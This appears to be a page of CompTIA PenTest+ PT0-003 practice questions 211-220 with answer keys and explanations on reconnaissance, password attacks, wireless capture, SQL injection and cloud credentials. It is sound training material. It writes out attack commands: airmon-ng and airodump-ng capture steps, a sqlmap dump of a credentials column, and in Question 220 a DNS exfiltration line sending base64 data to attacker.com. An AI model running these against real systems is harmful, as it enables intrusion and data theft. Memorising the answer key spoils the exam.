CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 211:

  Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

  A. NIST SP 800-53
  B. OWASP Top 10
  C. MITRE ATT&CK framework
  D. PTES technical guidelines
  C. MITRE ATT&CK framework

  ---

  Explanation

  References:

  https://digitalguardian.com/blog/what-mitre-attck-framework

• Question 212:

  A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access.

  Which of the following techniques should the tester use?

  A. Credential stuffing
  B. MFA fatigue
  C. Dictionary attack
  D. Brute-force attack
  A. Credential stuffing

  ---

  Explanation

  To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.

  Credential Stuffing:

  Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.

  Advantages: Unlike brute-force attacks, credential stuffing uses already known credentials, which reduces the number of attempts per account and minimizes the risk of triggering account lockout mechanisms.

  Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.

  Other Techniques:

  MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.

  Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.

  Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to high number of failed attempts.

  References:

  Password Attacks: Understanding different types of password attacks and their implications on account security.

  Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.

  By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.

• Question 213:

  A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes.

  Which of the following steps should the tester take next?

  A. Enable monitoring mode using Aircrack-ng.
  B. Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.
  C. Run KARMA to break the password.
  D. Research WiGLE.net for potential nearby client access points.
  A. Enable monitoring mode using Aircrack-ng.

  ---

  Explanation

  Enabling monitoring mode on the wireless adapter is the essential step before capturing WPA2 handshakes. Monitoring mode allows the adapter to capture all wireless traffic in its vicinity, which is necessary for capturing handshakes.

  Preparation:

  Wireless USB Dongle: Ensure the wireless USB dongle is compatible with monitoring mode and packet injection.

  Aircrack-ng Suite: Use the Aircrack-ng suite, a popular set of tools for wireless network auditing.

  Enable Monitoring Mode:

  Command: Use the airmon-ng tool to enable monitoring mode on the wireless interface.

  Step-by-Step Explanationairmon-ng start wlan0

  Verify: Check if the interface is in monitoring mode.

  iwconfig Capture WPA2 Handshakes:

  Airodump-ng: Use airodump-ng to start capturing traffic and handshakes.

  airodump-ng wlan0mon

  References from Pentesting Literature:

  Enabling monitoring mode is a fundamental step in wireless penetration testing, discussed in guides like "Penetration Testing - A Hands-on Introduction to Hacking".

  HTB write-ups often start with enabling monitoring mode before proceeding with capturing WPA2 handshakes.

  References:

  Penetration Testing - A Hands-on Introduction to Hacking

  HTB Official Writeups

• Question 214:

  During an assessment, a penetration tester exploits an SQLi vulnerability.

  Which of the following commands would allow the penetration tester to enumerate password hashes?

  A. sqlmap -u www.example.com/?id=1 --search -T user
  B. sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred
  C. sqlmap -u www.example.com/?id=1 --tables -D accounts
  D. sqlmap -u www.example.com/?id=1 --schema --current-user --current-db
  B. sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

  ---

  Explanation

  To enumerate password hashes using an SQL injection vulnerability, the penetration tester needs to extract specific columns from the database that typically contain password hashes. The --dump command in sqlmap is used to dump the contents of the specified database table. Here's a breakdown of the options:

  Option A: sqlmap -u www.example.com/?id=1 --search -T user

  The --search option is used to search for columns and not to dump data. This would not enumerate password hashes.

  Option B: sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred.

  This command uses -- dump to extract data from the specified database accounts, table users, and column cred. This is the correct option to enumerate password hashes, assuming cred is the column containing the password hashes.

  Option C: sqlmap -u www.example.com/?id=1 --tables -D accounts

  The --tables option lists all tables in the specified database but does not extract data.

  Option D: sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

  The --schema option provides the database schema information, and --current-user and --current-db provide information about the current user and database but do not dump data.

  References from Pentest:

  Writeup HTB: Demonstrates using sqlmap to dump data from specific tables to retrieve sensitive information, including password hashes.

  Luke HTB: Shows the process of exploiting SQL injection to extract user credentials and hashes by dumping specific columns from the database.

• Question 215:

  While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system.

  Which of the following is most likely responsible for this observation?

  A. Configuration changes were not reverted.
  B. A full backup restoration is required for the server.
  C. The penetration test was not completed on time.
  D. The penetration tester was locked out of the system.
  A. Configuration changes were not reverted.

  ---

  Explanation

  Debugging Mode:

  Purpose: Debugging mode provides detailed error messages and debugging information, useful during development.

  Risk: In a production environment, it exposes sensitive information and vulnerabilities, making the system more susceptible to attacks.

  Common Causes:

  Configuration Changes: During testing or penetration testing, configurations might be altered to facilitate debugging. If not reverted, these changes can leave the system in a vulnerable state.

  Oversight: Configuration changes might be overlooked during deployment.

  Best Practices:

  Deployment Checklist: Ensure a checklist is followed that includes reverting any debug configurations before moving to production.

  Configuration Management: Use configuration management tools to track and manage changes.

  References from Pentesting Literature:

  The importance of reverting configuration changes is highlighted in penetration testing guides to prevent leaving systems in a vulnerable state post-testing.

  HTB write-ups often mention checking and ensuring debugging modes are disabled in production environments.

  References:

  Penetration Testing - A Hands-on Introduction to Hacking

  HTB Official Writeups

• Question 216:

  A penetration tester plans to conduct reconnaissance during an engagement using readily available resources.

  Which of the following resources would most likely identify hardware and software being utilized by the client?

  A. Cryptographic flaws
  B. Protocol scanning
  C. Cached pages
  D. Job boards
  D. Job boards

  ---

  Explanation

  To conduct reconnaissance and identify hardware and software used by a client, job boards are an effective resource. Companies often list the technologies they use in job postings to attract qualified candidates. These listings can provide valuable insights into the specific hardware and software platforms the client is utilizing.

  Reconnaissance:

  This is the first phase in penetration testing, involving gathering as much information as possible about the target.

  Reconnaissance can be divided into two types: passive and active. Job boards fall under passive reconnaissance, where the tester gathers information without directly interacting with the target systems.

  Job Boards:

  Job postings often include detailed descriptions of the technologies and tools used within the company.

  For example, a job posting for a network administrator might list specific brands of hardware (like Cisco routers) or software (like VMware).

  Examples of Job Boards:

  Websites like LinkedIn, Indeed, Glassdoor, and company career pages can be used to find relevant job postings.

  These postings might mention operating systems (Windows, Linux), development frameworks (Spring, . NET), databases (Oracle, MySQL), and more.

  References:

  OSINT (Open Source Intelligence): Using publicly available sources to gather information about a target.

  Job boards are a key source of OSINT, providing indirect access to the internal technologies of a company.

  This information can be used to tailor subsequent phases of the penetration test, such as vulnerability scanning and exploitation, to the specific technologies identified.

  By examining job boards, a penetration tester can gain insights into the hardware and software environments of the target, making this a valuable reconnaissance tool.

• Question 217:

  A penetration tester has gathered a list of employee names and now wants to prepare for a phishing campaign by identifying and verifying the employees' current email addresses at the target domain.

  Which tool would BEST support this next step in the reconnaissance process?

  A. Wayback Machine
  B. Hunter.io
  C. SpiderFoot
  D. Social Engineering Toolkit
  B. Hunter.io

  ---

  Explanation

  After obtaining employee names, the immediate next step for a phishing campaign is often to discover their email addresses. Hunter.io is a service that helps find and verify email addresses for people at a domain (pattern discovery + verification). Using Hunter.io (or similar tools) lets the tester build an accurate recipient list before crafting phishing content or campaigns.

  Why not the others as the first step:

  Option A (Wayback Machine): Useful for finding historical content or pages but not directly for harvesting current email addresses.

  Option C (SpiderFoot): Powerful OSINT aggregation tool, could be used but is heavier and often used after initial enumeration.

  Option D (Social Engineering Toolkit): Used to craft/send phishing payloads once targets (email addresses) are gathered -- not the first data-gathering tool.

  PT0-003 mapping: Domain 2/3 -- OSINT and social-engineering reconnaissance.

• Question 218:

  A penetration tester successfully gained access to manage resources and services within the company's cloud environment. This was achieved by exploiting poorly secured administrative credentials that had extensive permissions across the network.

  Which of the following credentials was the tester able to obtain?

  A. IAM credentials
  B. SSH key for cloud instance
  C. Cloud storage credentials
  D. Temporary security credentials (STS)
  A. IAM credentials

  ---

  Explanation

  IAM (Identity and Access Management) credentials are used to control and manage access to cloud services and resources. When a penetration tester obtains IAM credentials, especially those with administrative privileges, they can perform high-level operations such as provisioning services, modifying configurations, or accessing sensitive data across the cloud environment.

  SSH keys would only grant access to a specific instance, not cloud-wide services.

  Cloud storage credentials are limited to storage access, not administrative capabilities.

  Temporary security credentials (STS) provide limited-time access and are not typically used for broad administrative tasks.

  References:

  PT0-003 Objective 1.3 ?Exploit cloud-based vulnerabilities, including credential abuse and privilege escalation via IAM.

• Question 219:

  Which of the following will reduce the possibility of introducing errors or bias in a penetration test report?

  A. Secure distribution
  B. Peer review
  C. Use AI
  D. Goal reprioritization
  B. Peer review

• Question 220:

  A penetration tester has discovered sensitive files on a system.

  Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?

  A. Encoding the data and pushing through DNS to the tester's controlled server.
  B. Padding the data and uploading the files through an external cloud storage service.
  C. Obfuscating the data and pushing through FTP to the tester's controlled server.
  D. Hashing the data and emailing the files to the tester's company inbox.
  A. Encoding the data and pushing through DNS to the tester's controlled server.

  ---

  Explanation

  DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices.

  Encoding the data and exfiltrating through DNS (Option A):

  DNS is often overlooked by DLP systems because it is required for network functionality.

  Attackers use DNS tunneling (e.g., dnscat2, IODINE) to exfiltrate data inside DNS queries.

  Example method echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "Data Exfiltration Techniques"

  Incorrect options:

  Option B (Cloud storage): Many organizations monitor file uploads to cloud storage.

  Option C (FTP): FTP is easily monitored and flagged by DLP solutions.

  Option D (Hashing and emailing): Emails are actively scanned by DLP policies.